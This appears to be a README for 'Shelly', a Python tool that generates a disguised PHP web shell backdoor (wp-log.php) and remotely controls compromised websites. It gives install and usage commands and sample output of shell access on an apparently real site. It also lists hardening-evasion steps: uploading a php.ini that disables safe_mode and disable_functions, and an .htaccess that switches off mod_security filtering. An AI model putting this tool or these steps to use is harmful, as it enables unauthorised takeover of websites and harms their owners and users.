Shelly is a simple tool that is written using Python, which functions to remote a website

$ git clone https://github.com/tegal1337/Shelly
$ cd Shelly
$ python3 shell.py

sudo pip install -r requirements.txt

python3 shell.py -g wp-log -p tegal1337
   ______      ____
  / __/ / ___ / / __ __
 _\ \/ _ / -_/ / / // /
/___/_//_\__/_/_/\_, /
                /___/  v.1
--------------------------
Python shell - Tegal1337 |
Generate :
[+] ./backdoor.py -g "nama_shell" -p "password"
Connect Server :
[+] ./backdoor.py -u "url_shell" -p "password"

Backdoor berhasil dibuat dengan nama wp-log.php dan password tegal1337

dalpan@Tegal1337:~/Tools$ python3 shell.py -u "https://www.pamz3d.com/wp-log.php" -p tegal1337
/opt/lampp/htdocs/php-futsal$ id
uid=501(pamz3d) gid=501(pamz3d) groups=501(pamz3d)

• look for the folder whose permissions 777 (rwx rwx rwx)
• Upload file php.ini

safe_mode = OFF
disable_functions = NONE

• And upload file .htaccess

SecFilterEngine Off
SecFilterScanPOST Off

• https://blog.tegalsec.org/meremote-sebuah-website-menggunakan-backdoor-python/

• Email : van@tegalsec.org